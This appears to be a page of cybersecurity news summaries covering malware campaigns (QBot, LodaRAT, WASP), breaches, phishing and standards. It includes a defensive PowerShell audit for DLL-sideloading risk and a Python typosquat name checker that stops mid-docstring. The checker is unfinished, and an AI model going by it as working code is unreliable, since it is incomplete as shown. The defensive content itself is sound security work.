News Items

  • news

    "PCI SSC Publishes New Standard for Mobile Payment Acceptance Solutions"

    The PCI Security Standards Council (PCI SSC) has released a new standard to help in the evolution of mobile payment acceptance solutions. PCI Mobile Payments on COTS (MPoC) expands on the existing PCI Software-based PIN Entry on COTS (SPoC) and PCI Contactless Payments on COTS (CPoC) standards, which address security requirements for merchants accepting cardholder PINs or contactless payments using a smartphone or other commercial off-the-shelf (COTS) mobile device. The PCI MPoC standard aims to increase flexibility in payment acceptance and in the development, deployment, and maintenance of COTS-based payment acceptance solutions. PCI MPoC is a new, adaptable mobile standard and program for the development of payment solutions. It provides a modular, objective-based security standard that supports various payment acceptance channels and consumer verification methods on COTS devices. The new standard combines many of the existing PCI SPoC and PCI CPoC standards, most notably the ability to enter both PIN and contactless cardholder data on the same COTS device. It will be of interest to vendors of card payment acceptance technologies and solutions because it may provide new types of solutions for them to address in their markets. Similarly, entities that deploy or use terminals may be interested in seeing what controls are put in place to secure the technologies that they may use next year and in the future. This article continues to discuss the new PCI MPoC standard.

    Help Net Security reports "PCI SSC Publishes New Standard for Mobile Payment Acceptance Solutions"

  • news

    "Elastic Report: Nearly 33% Of Cyberattacks in the Cloud Leverage Credential Access"

    According to the 2022 Elastic Global Threat Report, almost 33 percent of cloud attacks use credential access, suggesting that users often overestimate the security of their cloud environments and, as a result, fail to configure and protect them adequately. The report's key findings center on three primary trends: human error's role in increasing cloud security risks, malicious use of commercial software, and endpoint attacks becoming more diverse because most endpoint security software is highly effective. While commercial adversary simulation software like CobaltStrike helps many teams defend their environments, it is also being used as a malicious tool for mass-malware implants. Windows endpoints accounted for 54 percent of all malware infections, while 39 percent occurred on Linux endpoints. Meterpreter contributed the most Linux-based malware/payloads (14 percent), followed by Gafgyt (12 percent) and Mirai (10 percent). With 35 percent of all detections, CobaltStrike was the most common malicious binary or payload for Windows endpoints, followed by AgentTesla at 25 percent and RedLineStealer at 10 percent. In addition, threat actors are using more than 50 endpoint infiltration methods, indicating that endpoint security is effective, as its sophistication requires threat actors to constantly find new ways to make their attacks successful. This article continues to discuss key findings from the 2022 Elastic Global Threat Report.

    VB reports "Elastic Report: Nearly 33% Of Cyberattacks in the Cloud Leverage Credential Access"

  • news

    "Phishing Kit Impersonates Well-Known Brands to Target US Shoppers"

    Since mid-September, a sophisticated phishing kit has been targeting North Americans with lures themed around holidays such as Labor Day and Halloween. The kit employs a variety of detection evasion techniques as well as several mechanisms to keep non-victims away from its phishing pages. According to Akamai security researchers who discovered the campaign, one of the most intriguing features of the kit is a token-based system that ensures each victim is redirected to a unique phishing page URL. The campaign began in September 2022 and ran through October 2022, preying on online shoppers. The main theme of the phishing emails sent to potential victims is the opportunity to win a prize from a reputable brand. The links in the email raise no red flags because they lead to the phishing site only after a series of redirections, and URL shorteners hide most URLs. Furthermore, the attackers take advantage of legitimate cloud services such as Google, AWS, and Azure, using their good reputation to circumvent security measures. Everyone who visits the phishing site is offered the promised prize after completing a short survey. In addition, a five-minute timer instills a sense of urgency in those taking the survey. DICK'S Sporting Goods, Delta Airlines, Sam's Club, Costco, and more are among the impersonated brands. The phishing actors also included fake user testimonials showcasing the received prizes to increase the campaign's effectiveness. This article continues to discuss the phishing kit targeting North American online shoppers.

    Bleeping Computer reports "Phishing Kit Impersonates Well-Known Brands to Target US Shoppers"

  • news

    "LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities"

    LodaRAT malware has resurfaced with new variants being used in tandem with other sophisticated malware, such as RedLine Stealer and Neshta. According to Cisco Talos researcher Chris Neal, the ease of access to LodaRAT's source code makes it an appealing tool for any threat actor interested in its capabilities. LodaRAT has been observed being delivered via a previously unknown variant of another commodity Trojan called Venom RAT, codenamed S500, in addition to being dropped alongside other malware families. LodaRAT is an AutoIT-based malware associated with the Kasablanca group and can harvest sensitive information from compromised machines. In February 2021, an Android version of the malware appeared, allowing threat actors to broaden their attack surface. Then, in September 2022, Zscaler ThreatLabz discovered a new delivery mechanism involving the use of Prynt Stealer, an information stealer. According to Cisco Talos' latest findings, altered variants of LodaRAT have been detected in the wild with updated functionality, allowing it to spread to every attached removable storage device and detect running antivirus processes. The revamped implementation is also deemed ineffective because it searches for an explicit list of 30 different process names associated with various cybersecurity vendors, implying that a solution that does not meet the search criteria will be missed. This article continues to discuss the resurfacing of the LodaRAT malware with new variants.

    THN reports "LodaRAT Malware Resurfaces with New Variants Employing Updated Functionalities"

  • news

    "Study Uncovers New Threat to Security and Privacy of Bluetooth Devices"

    Bluetooth-enabled mobile devices have been found to be vulnerable to a flaw that could allow attackers to track a user's location. The study centers on Bluetooth Low Energy (BLE), a type of Bluetooth that uses less energy than Bluetooth Classic, an earlier generation of Bluetooth. Billions of people rely on this type of wireless communication on smartwatches and smartphones for various activities such as entertainment, sports, retail, and healthcare. However, due to a design flaw in Bluetooth's protocol, users' privacy may be jeopardized, according to Yue Zhang, the study's lead author and a postdoctoral researcher in computer science and engineering at the Ohio State University (OSU). Zhang and his advisor, Zhiqiang Lin, an Ohio State professor of computer science and engineering, demonstrated the threat by testing more than 50 commercially available Bluetooth devices as well as four BLE development boards. They informed major Bluetooth industry stakeholders, including the Bluetooth Special Interest Group (SIG), hardware vendors like Texas Instruments and Nordic, and operating system providers such as Google, Apple, and Microsoft, about the flaw. Google classified their discovery as a high-severity design flaw and awarded the researchers a bug bounty. Zhang and Lin also created a potential solution to the problem, which they tested successfully. Bluetooth devices have Media Access Control (MAC) addresses, a series of random numbers uniquely identifying them on a network. An idle BLE device sends out a signal every 20 milliseconds advertising its MAC address to other nearby devices with which it could connect. The study identifies a flaw that could allow attackers to observe how these devices interact with the network and then collect and analyze data to violate a user's privacy, either passively or actively. One of the reasons researchers are concerned about such a scenario is that a captured MAC address could be used in a replay attack, enabling the attacker to monitor the user's behaviors, track where the user has been in the past, or even determine the user's current location. The researchers' solution, called Securing Address for BLE (SABLE), entails adding an unpredictable sequence number or a timestamp to the randomized address to ensure that each MAC address can only be used once, thereby preventing the replay attack. It was successful in preventing attackers from connecting to the victim's devices. This article continues to discuss the new threat to the security and privacy of Bluetooth devices as well as the countermeasure developed to address it.

    OSU reports "Study Uncovers New Threat to Security and Privacy of Bluetooth Devices"

  • news

    "QBot Phishing Abuses Windows Control Panel EXE to Infect Devices"

    Phishing emails distributing the QBot malware are infecting computers by exploiting a Dynamic-Link Library (DLL) hijacking flaw in the Windows 10 Control Panel, most likely to avoid detection by security software. DLL hijacking is a common attack technique that exploits the way DLLs are loaded in Windows. When a Windows executable is launched, it searches the Windows search path for any DLL dependencies. However, if a threat actor creates a malicious DLL with the same name as one of the program's required DLLs and places it in the same folder as the executable, the program will load that malicious DLL instead of the required DLL, infecting the computer. QBot, also known as Qakbot, is a Windows malware that began as a banking Trojan but has since evolved into a full-fledged malware dropper. The malware is also used by ransomware gangs such as Black Basta, Egregor, and Prolock to gain initial access to corporate networks. In July, a security researcher discovered that threat actors were installing the QBot malware by exploiting a DLL hijacking vulnerability in the Windows 7 Calculator. According to the security researcher ProxyLife, attackers have switched to exploiting a DLL hijacking flaw in the Windows 10 Control Panel executable. Since QBot is installed through a trusted program, such as the Windows 10 Control Panel, security software may not flag the malware as malicious, thus allowing it to avoid detection. QBot will now run in the background, quietly stealing emails for use in phishing attacks and downloading additional payloads like Brute Ratel or Cobalt Strike. Threat actors use Brute Ratel and Cobalt Strike post-exploitation toolkits to gain remote access to corporate networks. This remote access is typically used to steal corporate data and launch ransomware attacks. This article continues to discuss phishing emails distributing the QBot malware that use a DLL hijacking flaw in the Windows 10 Control Panel to infect computers.

    Bleeping Computer reports "QBot Phishing Abuses Windows Control Panel EXE to Infect Devices"

  • news

    "As SaaS App Usage Soars, Consolidation and Security Concerns Drive Change"

    BetterCloud, a cloud service management company, discovered that organizations are increasingly using Software-as-a-Service (SaaS) apps, but the industry is changing due to consolidation and app security concerns. The company's 10th annual State of SaaSOps report, based on a survey of 742 Information Technology (IT) and security professionals, looked into the growing adoption of SaaS, the most pressing challenges confronting IT operations today, and why SaaS security keeps IT staff awake at night. In the last year, 43 percent of those surveyed said they had added a new SaaS app that stores sensitive data, and 81 percent said they are responsible for protecting this sensitive data. The implementation of new SaaS apps was balanced by those that were canceled, with 40 percent reporting that they had retired duplicate and overlapping applications in the last 12 months. The net growth of SaaS apps was 18 percent year-over-year, with organizations now using an average of 130 apps. According to 59 percent of those surveyed, SaaS sprawl is causing management headaches, and SaaS proliferation is difficult to manage. One of the major issues is "shadow" SaaS apps, which are considered a problem by 65 percent of respondents. However, 57 percent reported that their teams' support for the number of SaaS apps they manage has increased in the last year. Eighty percent of respondents cited employee experience as a driving force behind SaaS adoption and changes. Employee experience was also cited as a key motivator for initiatives to automate workflows by those surveyed. Eighty-six percent of respondents emphasized that automation is critical to overcoming today's SaaSOps challenges. Seventy-one percent have automated at least one help desk process, such as onboarding or password resets, and 43 percent have a dedicated SaaSOps automation role or team, with another 23 percent planning to do so. This article continues to discuss key findings from BetterCloud's latest State of SaaSOps report.

    SiliconANGLE reports "As SaaS App Usage Soars, Consolidation and Security Concerns Drive Change"

  • news

    "Meta Reportedly Disciplined or Fired More Than Two Dozen Workers For Taking Over Facebook User Accounts"

    Meta Platforms reportedly recently fired or disciplined more than two dozen employees and contractors who allegedly compromised and took control of Facebook user accounts. Bribery was involved in some cases. Users who were locked out of their Facebook accounts often weren't able to regain access through traditional means, such as reaching out to Facebook directly. So, some users resorted to seeking outside sources who have contacts within Meta who were willing to unlock accounts for them. In some cases, workers accepted thousands of dollars in bribes from hackers to compromise or access user accounts. The terminations or discipline came about as a result of an internal investigation. Meta communications director Andy Stone stated that individuals selling fraudulent services are always targeting online platforms, including ours, and adapting their tactics in response to the detection methods that are commonly used across the industry. Some of the fired workers were employed as Allied Universal contractors providing security for Meta facilities, who were given access to internal employee tools to assist company employees.

    CNBC reports: "Meta Reportedly Disciplined or Fired More Than Two Dozen Workers For Taking Over Facebook User Accounts"

  • news

    "Detecting and Defending Against DLL Sideloading Attacks"

    Dynamic-Link Library (DLL) sideloading, also known as DLL hijacking, often gets overlooked. However, because of their widespread nature and ease of exploit development, these flaws are valuable for digital adversaries. Many Windows services are currently vulnerable to these attacks. In a detailed analysis of 23 files identified as MuddyWater tools, the FBI, the US Homeland Security Department's Cybersecurity and Infrastructure Security Agency (CISA), the US Cyber Command Cyber National Mission Force, the National Security Agency (NSA), and the UK's National Cyber Security Centre found a DLL file renamed to a legitimate filename in order to enable the DLL sideloading technique. In a DLL sideloading attack, the threat actor places a malicious DLL file in the same directory as a trusted EXE. If the EXE tries to load a DLL with the same name, the attacker's DLL is loaded instead. In many cases, an attacker does not need to know which methods the EXE plans to call in the DLL because it is possible to create a DLL that runs code immediately as it is loaded. This is by design, putting any user account at risk of compromise. It is worth noting that this is a particularly serious issue with Windows services because service configurations allow attackers to quickly force the issue by simply adding a malicious DLL and then restarting the service, possibly with a simple reboot. The required level of sophistication is low, and a single DLL sideloading exploit kit can be used against almost any software with unsafe permissions in the installation folder. This article continues to discuss DLL sideloading attacks and how to stay ahead of them.
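    Both this item and the QBot item above hinge on the same precondition: a trusted EXE whose folder a low-privilege user can write to. The PowerShell below is an added example, not code from either article or from any vendor, that audits Windows services for that condition and then lists DLLs beside the service EXE that carry no valid Authenticode signature; the principal list and the "drop rights" mask are assumptions chosen for this example and should be adjusted to local policy.

```powershell
# Added example (not from the articles): audit service binary folders for
# sideloading preconditions. Run from an elevated PowerShell session so every
# service folder's ACL is readable.

# Principals whose write access to a service folder is treated as a finding.
# Assumption for this example; extend to local groups as policy requires.
$RiskyPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Directory rights that allow creating or replacing a file in the folder,
# which is all that is needed to place a DLL next to the executable.
$DropRights = [System.Security.AccessControl.FileSystemRights]'CreateFiles, DeleteSubdirectoriesAndFiles'

function Get-ServiceImagePath {
    param([string]$PathName)
    # Win32_Service.PathName may be quoted and may carry arguments; keep the .exe path only.
    if ($PathName -match '^"?(?<exe>.+?\.exe)"?') {
        return [System.Environment]::ExpandEnvironmentVariables($Matches.exe)
    }
    return $null
}

function Test-WritableByRiskyPrincipal {
    param([string]$Folder)
    $acl = Get-Acl -LiteralPath $Folder -ErrorAction Stop
    foreach ($rule in $acl.Access) {
        if ($rule.AccessControlType -ne 'Allow') { continue }
        if ($RiskyPrincipals -notcontains $rule.IdentityReference.Value) { continue }
        $rights = [int]$rule.FileSystemRights
        # Negative values are generic rights (GENERIC_ALL/GENERIC_WRITE); treat as writable.
        if ($rights -lt 0 -or (($rights -band [int]$DropRights) -ne 0)) {
            [pscustomobject]@{
                Folder    = $Folder
                Principal = $rule.IdentityReference.Value
                Rights    = $rule.FileSystemRights
                Inherited = $rule.IsInherited
            }
        }
    }
}

function Find-SideloadableServiceFolders {
    # One finding per (folder, principal); a folder shared by several services
    # is attributed to the first service that referenced it.
    $seen = @{}
    foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
        $exe = Get-ServiceImagePath $svc.PathName
        if (-not $exe) { continue }
        $folder = Split-Path -LiteralPath $exe -Parent
        if (-not $folder -or $seen.ContainsKey($folder)) { continue }
        $seen[$folder] = $true
        if (-not (Test-Path -LiteralPath $folder)) { continue }
        try {
            foreach ($hit in Test-WritableByRiskyPrincipal -Folder $folder) {
                $hit | Add-Member -NotePropertyName Service -NotePropertyValue $svc.Name -PassThru
            }
        } catch {
            Write-Verbose "Could not read ACL for $folder : $_"
        }
    }
}

function Find-UnsignedDll {
    param([string]$Folder)
    # A DLL dropped beside a trusted EXE usually lacks a valid signature; report
    # such files so they can be compared against the vendor's shipped file list.
    Get-ChildItem -LiteralPath $Folder -Filter *.dll -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $sig = Get-AuthenticodeSignature -FilePath $_.FullName
            if ($sig.Status -ne 'Valid') {
                [pscustomobject]@{
                    Dll      = $_.FullName
                    Status   = $sig.Status
                    Modified = $_.LastWriteTime
                }
            }
        }
}

$findings = @(Find-SideloadableServiceFolders)
$findings | Format-Table Service, Folder, Principal, Rights, Inherited -AutoSize
# For each weak folder, list DLLs beside the EXE that have no valid signature.
$findings | Select-Object -ExpandProperty Folder -Unique |
    ForEach-Object { Find-UnsignedDll -Folder $_ } | Format-Table -AutoSize
```

An unsigned DLL in a writable service folder is a lead, not a verdict; legitimate third-party software ships unsigned DLLs too, so confirm against the vendor's file list before acting.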

    Security Boulevard reports "Detecting and Defending Against DLL Sideloading Attacks"

  • news

    "Zeus Botnet Suspected Leader Arrested in Geneva"

    Swiss authorities have recently arrested a Ukrainian national wanted by the Federal Bureau of Investigation (FBI) for 12 years for connections with a cyber-criminal group that stole millions of dollars from bank accounts using malware called Zeus. Vyacheslav Igorevich Penchukov was arrested in Geneva on October 23, 2022, and is now pending extradition to the US. Penchukov was first named in a 2012 indictment by the US Department of Justice, alongside Ivan Viktorvich Klepikov and Alexey Dmitrievich Bron, as one of the leaders in the JabberZeus Crew, a small cyber-criminal gang from Ukraine and Russia that attacked victims with a customized version of the Zeus banking Trojan. The indictment says the Zeus malware captured passwords, account numbers, and other information necessary to log into online banking accounts. The conspirators allegedly used the information captured by Zeus to steal millions of dollars from victims' bank accounts. In November 2014, two additional members of JabberZeus, Yevhen Kulibaba and Yuriy Konovalenko, pleaded guilty after being arrested and deported from the UK. They were sentenced to two years and 10 months of incarceration a year later. All participants in the gang were accused of conspiracy to commit computer fraud and identity theft, conspiracy to participate in racketeering activity, aggravated identity theft, and several counts of bank fraud. The JabberZeus gang mainly targeted small and mid-sized businesses, and its members were pioneers of the so-called "man-in-the-browser" attacks. After accessing victims' bank accounts, the hackers would modify the firm's payroll to include dozens of "money mules" who would handle bank transfers and forward any stolen payroll deposits overseas. According to a Wired report from 2017, the original version of the Zeus banking Trojan was allegedly created by an anonymous individual known by the handle "lucky12345." The Zeus criminal group has now been reportedly dismantled, but years later, banking Trojans remain a pressing issue in the cybersecurity community.

    Infosecurity reports: "Zeus Botnet Suspected Leader Arrested in Geneva"

  • news

    "Persistent Cybersecurity Threats Impede HHS Strategic Plans, Watchdog Warns"

    According to a new report from the Office of the Inspector General (OIG), as the Department of Health and Human Services (HHS) strives for greater interoperability across the healthcare sector, the agency must increase efforts to modernize its approach to cybersecurity. The report, "Top Management and Performance Challenges Facing HHS," outlines the healthcare regulator's complex challenges, with a section dedicated to cybersecurity concerns. OIG discovered that HHS had made efforts to improve its posture, particularly following the Biden administration's executive order in May 2021 directing federal agencies to fundamentally and systemically change their approach to cybersecurity. HHS is finalizing its strategic plan, but the road ahead has challenges shared by the government and healthcare sectors, including persistent cybersecurity threats. According to the report, significant investments in resources, as well as cultural and organizational change, will be required. HHS has long struggled to meet the challenges confronting its information security program, with yearly reports from both the OIG and the Government Accountability Office (GAO) consistently deeming the program ineffective under the Federal Information Security Modernization Act (FISMA) metrics. The most recent OIG audit, released in April, discovered that HHS failed to meet the "managed and measurable" maturity level for all five function areas (identifying, protecting, detecting, responding, and recovering) required by Department of Homeland Security (DHS) guidance and FISMA. HHS is working to address these vulnerabilities to meet the executive order's requirements for federal agencies on specific cybersecurity standards and objectives by the end of fiscal year 2024, which includes adopting a zero-trust security architecture approach. This article continues to discuss HHS cybersecurity challenges.

    SC Media reports "Persistent Cybersecurity Threats Impede HHS Strategic Plans, Watchdog Warns"

  • news

    "Security Budget Cuts and Recession Spark Worries Among IT Admins"

    According to researchers at JumpCloud, IT professionals worry that cybersecurity-specific funding might be at risk. Of those surveyed, 44% agree their organization will cut spending on cybersecurity in the next year. Many of the respondents (75%) said cuts to their organization's security budget would increase organizational risk, and 58% said they were more concerned about their organization's security posture than they were six months ago. The researchers noted that factors behind the cuts to cybersecurity funding include inflation, labor shortages, recession talks, market volatility, and global conflicts. The researchers stated that some of these factors are, in turn, also causing licensing costs to increase, with 22% of respondents expecting to spend 50% or more of their budget on licensing in the coming year, up from 17% in April 2022. Many participants (78%) reported seeing evidence of a recession in their business. Among them, 34% said business had been severely impacted. For 34% of those surveyed, labor shortages significantly impact business or are a severe business limiter.

    Infosecurity reports: "Security Budget Cuts and Recession Spark Worries Among IT Admins"

  • news

    "Revealed: The Top 200 Most Common Passwords of 2022"

    Despite their insecurity, sequential strings of numbers and "password" remain users' most popular password choices worldwide. NordPass' annual study of the top 200 most popular passwords also revealed that in the UK, names of football teams ranked highly among the most-used passwords of the year. For example, the password "liverpool" was the fourth most popular of the year, while "arsenal," "chelsea," and "liverpool1" were all in the top 15. Regional results, such as those from France, revealed similarly insecure password practices, but the actual passwords differed. For example, the third most popular password in the country was "azerty," the equivalent of "qwerty" on a French keyboard layout. NordPass also included data sets organized by user gender, which revealed some significant differences in password frequency. In the US, the most popular password among women was "guest," while "12345" was the most popular among men. The most secure password in the top 200 was "9136668099," which is estimated to take hackers four days to crack. However, it is still not a secure password because it contains no letters or special characters. Regularly updating one's password is good security practice, and experts advise against using easy-to-guess words or phrases, or anything that a threat actor could easily link to an individual. Hackers employ various password-cracking techniques, but brute-force attacks, in which hackers guess a victim's password through different forms of trial and error, are common. Hackers can use powerful hardware such as Graphics Processing Units (GPUs) to speed up password cracking, but the most basic brute-force attacks involve trying common passwords until access is granted, which is reason enough for users to avoid using anything that resembles a password in the top 200. This article continues to discuss findings from NordPass' report on the top 200 most common passwords.

    ITPro reports "Revealed: The Top 200 Most Common Passwords of 2022"

  • news

    "Data Breach at Arkansas Department of Human Services Releases Medicaid Information"

    Officials with the Arkansas Department of Human Services have recently discovered a data breach that released client data. The officials said the breach came on Sept. 16 when an employee sent emails from her DHS email account to her personal Yahoo email account. The emails had attachments of spreadsheets that listed 925 DHS Medicaid clients who had been diagnosed with the flu. The officials noted that listed in the attachments were the person's Medicaid ID, date of birth, gender, county, zip code, and diagnosis. Names, Social Security numbers, full addresses, and financial information were not disclosed in the breach. Department officials said they had notified the affected clients by mail about the breach. It was noted that the staff is trained on security, including patient privacy. Part of the training employees receive includes using secure and encrypted email and not using personal email for client health information. Officials said the department is taking steps to prevent a data breach like this from taking place in the future.

    MSN reports: "Data Breach at Arkansas Department of Human Services Releases Medicaid Information"

  • news

    "More Than Half of Black Friday Spam Emails Are Scams"

    According to new research by Bitdefender, over half (56%) of Black Friday spam emails received between October 26 and November 6, 2022, were scams. The researchers analyzed all unsolicited Black Friday-related emails delivered to Bitdefender's customers over the period, with the vast majority (68%) sent on the final three days (November 4, 5, and 6). Unsurprisingly, the highest proportion of Black Friday spam messages were received in the US (27%). This was closely followed by Ireland (24%), then Sweden (8%), Denmark (7%), and France (5%). The researchers found that scammers placed a heavy emphasis on using fake discount offers on designer bags and sunglasses to lure consumers to fake shops to steal their money and data. Another significant avenue pursued by fraudsters was "giveaway scams." The researchers stated that, similar to 2021, spammers were keen on exploiting internet users' attraction to freebies and giveaways.

    Infosecurity reports: "More Than Half of Black Friday Spam Emails Are Scams"

  • news

    "Q&A: UW Researchers Find Privacy Risks With 3D Tours on Real Estate Websites"

    Virtual 3D tours on real estate websites like Zillow and Redfin enable viewers to explore homes without travel. The homes in these tours are sometimes staged, but they also contain evidence of current residents' lives. Researchers at the University of Washington (UW) were interested in whether personal belongings visible in 3D tours could pose privacy and security risks. They looked at 44 3D tours on a real estate website, each of which was for a home in a different state, and included at least one personal detail, such as a letter, a college diploma, or a photo. According to the researchers, the details left in these tours could expose residents to various threats, such as phishing attacks or credit card fraud. The researchers' findings were published on November 8 and will be presented at the USENIX Security Symposium 2023. According to lead author Rachel McAmis, a UW doctoral student in the Paul G. Allen School of Computer Science & Engineering, the team discovered traditionally sensitive information that people should never share with strangers, as well as information that reveals people's behavior and preferences. The majority of 3D tours in the study revealed the full names of residents. There were 3D tours that included labeled medication, passwords, credit card information, and a letter indicating a legal violation. Viewers of 3D tours can also see people's behaviors and preferences, such as the products and brands they buy, their political affiliation, how clean their house is, how many family members live together, their religion, and whether or not they own a pet. Such information revealed in the 3D tours could be used by malicious actors to target a resident with a personalized message. For example, a malicious actor can send a phishing message pretending to be an email from a brand from which the resident frequently purchases. This article continues to discuss the study on potential security and privacy issues that emerge when personal details are included in virtual 3D tours on real estate websites.

    UW News reports "Q&A: UW Researchers Find Privacy Risks With 3D Tours on Real Estate Websites"

  • news

    "Better Governance Is Crucial to Getting Value From Data"

    Data is one of the most valuable resources for businesses, but extracting that value requires effective content management. According to a new Rocket Software survey of more than 500 corporate Information Technology (IT) professionals from various industries in the US, UK, and APAC regions, business data is still vastly unstructured, with 81 percent indicating that at least some of their data is considered 'dark.' Security rises to the top of organizations' concerns once they begin managing their data, but respondents note additional features that would greatly enhance content management, such as the ability to apply automation and rules-based redaction (full or partial) to protect sensitive data (62 percent), the ability to manage content types regardless of size or origin (61 percent), and having a single view of content from across multiple, disparate repositories (60 percent). According to 81 percent of respondents from larger organizations with 1,000-4,999 employees, automating their organization's current information security and compliance processes would give them a competitive advantage. This article continues to discuss key findings from Rocket Software's survey.

    BetaNews reports "Better Governance Is Crucial to Getting Value From Data"

  • news

    "Chinese Spy Gets 20 Years for Aviation Espionage Plot"

    A prolific Chinese spy who tried to steal secrets from US aviation companies has recently been jailed for 20 years. According to the Department of Justice (DoJ), Yanjun Xu, 42, rose to become deputy division director at the Ministry of State Security (MSS) intelligence agency. However, he was arrested in Belgium in 2018 after being lured there by an FBI agent posing as a GE Aviation employee whom Xu was cultivating to provide Beijing with information. Xu was the first ever Chinese intelligence officer to be extradited to the US, according to the DoJ. The DoJ noted that the spy reportedly played a key role in a sophisticated, multi-year plot to steal trade secrets from western aerospace firms that helped the country build its C919 commercial airliner, among other things. Xu used aliases, front companies, and universities to trick aviation employees and solicit information, sometimes recruiting them to travel to China under the guise of giving a presentation at a university, for which they were paid. The DoJ noted that he also worked with colleagues to hack the computers of GE Aviation employees in their hotel rooms while other MSS officials took the staffers out to dinner. Xu also recruited insiders at a French aircraft engine manufacturer's plant in China who were willing to spy for Beijing and planted malware on the laptop of a French executive who frequently traveled to the facility. Xu also directed Chaoqun Ji, who entered the US on an F-1 student visa, to recruit individuals in the US. In 2016, Ji was allowed to join the US Army and apparently stated that his plan was to obtain a top security clearance. He was convicted in 2022. FBI director Christopher Wray said this case is the latest example of the Chinese government's continued attacks on American economic and national security. A federal jury in Cincinnati convicted Xu on all counts: conspiracy to commit economic espionage, conspiracy to commit trade secret theft, attempted economic espionage, and attempted trade secret theft.

    Infosecurity reports: "Chinese Spy Gets 20 Years for Aviation Espionage Plot"

  • news

    Visible to the public "Misconfigured Server Exposed PHI of 600,000 Inmates"

    A server misconfiguration at a company that processes medical claims for correctional facilities exposed sensitive information on nearly 600,000 inmates. CorrectCare Integrated Health Inc. of Kentucky reported to the US Department of Health and Human Services (HHS) on October 31 at least three "unauthorized access/disclosure" breaches stemming from the misconfiguration, together affecting nearly 500,000 people. The HHS Office for Civil Rights' HIPAA Breach Reporting Tool website also lists several breaches reported by CorrectCare's clients in recent weeks, affecting an additional 100,000 people. Clients include the Louisiana Department of Public Safety and Corrections, Sacramento County Adult Correctional Health, and Mediko Correctional Healthcare, a company that provides medical and mental health services to inmates in correctional facilities. According to a notification letter, two file directories on a CorrectCare web server had been exposed to the Internet. CorrectCare says the directories contained Protected Health Information (PHI) of individuals who were incarcerated in state prisons: full names, dates of birth, Social Security numbers, and limited health information such as diagnosis codes and procedure codes. No driver's license numbers, financial account details, or payment card data were compromised, according to the company. This article continues to discuss the exposure of PHI on 600,000 inmates due to a server misconfiguration.

    InfoRiskToday reports "Misconfigured Server Exposed PHI of 600,000 Inmates"

  • news

    Visible to the public "FDA, MITRE Publish Updated Medical Device Security Incident Response Playbook"

    The US Food and Drug Administration (FDA) and MITRE have published an updated version of their "Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook," which provides actionable strategies and resources for healthcare organizations to respond to cyber incidents while maintaining medical device security. Since the playbook's first iteration in 2018, cyberattacks have continued to have a significant impact on the healthcare sector. Medical device security remains a top priority for healthcare organizations, and keeping those devices operational during a cyber incident is critical. The updated playbook includes a resource appendix to help healthcare organizations navigate the playbook's contents and identify key resources. Furthermore, the playbook emphasizes the importance of having a diverse team participate in incident response exercises, ranging from clinicians to Information Technology (IT) staff. The FDA and MITRE also aimed to improve the playbook's alignment with the Hospital Incident Command System (HICS) for dealing with complex incidents. The updated version also includes a "Playbook Quick Start Companion Guide" to help organizations orient themselves and identify key priority areas. The playbook emphasizes the importance of regional partner collaboration and trust, as well as creating a medical device asset inventory and conducting a Hazard Vulnerability Analysis (HVA). With healthcare-related cyber incidents growing in size and scope, having a strong, well-executed support infrastructure in place before a cyber event is critical to executing a rapid, comprehensive, and robust response. This article continues to discuss the updated version of the Medical Device Cybersecurity Regional Incident Preparedness and Response Playbook.

    HealthITSecurity reports "FDA, MITRE Publish Updated Medical Device Security Incident Response Playbook"

  • news

    Visible to the public "WASP Malware Stings Python Developers"

    WASP malware uses steganography and polymorphism to avoid detection, with malicious Python packages designed to steal credentials, personal information, and cryptocurrency. Earlier this month, researchers from Phylum and Check Point reported finding new malicious packages on the Python Package Index (PyPI). Checkmarx analysts linked the same attacker to both reports and said the operator is still releasing malicious packages. A Checkmarx report detailed hundreds of successful infections by the WASP information stealer and described features intended to keep it persistent on a compromised PC and to evade security tools. The operator is selling copies of WASP to other criminals for $20 in cryptocurrency or gift cards. PyPI is becoming a more popular target in software supply chain attacks, with malicious code uploaded in fake packages. Typosquatting is a technique in which malicious packages are given names that sound legitimate or closely resemble real packages, so that developers are duped into installing booby-trapped packages that appear useful and legitimate. Check Point noted that such packages typically combine three elements: malicious code that downloads and runs the payload, carrier code that smuggles that logic into the package, and a lure, such as a typosquatted name, that gets victims to install it. In August, the PyPI community issued a warning about the first-ever phishing attack against its users. If a developer installs the malicious package on their system, it becomes an initial infection point for other malware, in this case the WASP information-stealing Trojan. This article continues to discuss the WASP information-stealing malware impacting the software supply chain.
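
    The typosquatting lure above can be screened for before a package is ever installed. The following is an added example written for this item, not code from Checkmarx, Phylum, Check Point or PyPI: it normalizes names the way pip does (PEP 503), measures edit distance against a list of known packages, and also catches a known name wrapped in extra characters. The KNOWN_PACKAGES list is a constructed sample, not a real popularity ranking.

```python
"""Typosquat screening for package names, added here as an illustration of the
typosquatting technique described above. This is not code from Checkmarx,
Phylum, Check Point or PyPI; KNOWN_PACKAGES is a constructed sample list, not a
real popularity ranking."""
import re

KNOWN_PACKAGES = [
    "requests", "numpy", "colorama", "urllib3", "setuptools",
    "python-dateutil", "pyyaml", "cryptography",
]


def normalize(name: str) -> str:
    """PEP 503 name normalization: case-fold and collapse runs of '-', '_' and '.'
    into a single '-', so 'PyYAML' and 'pyyaml' compare the way pip compares them."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insert, delete, substitute and swap
    of adjacent characters each cost 1 (catches 'reqeusts' as well as 'requets')."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def typosquat_candidate(name, known=KNOWN_PACKAGES, max_distance=1):
    """Return the known package `name` looks like, or None if it is an exact
    (normalized) match or nothing is close enough.

    Two heuristics: a near-miss spelling within `max_distance` edits, and a
    known name wrapped in extra characters ('requests3', 'python-requests').
    Both produce false positives on legitimate packages such as 'requests-oauthlib',
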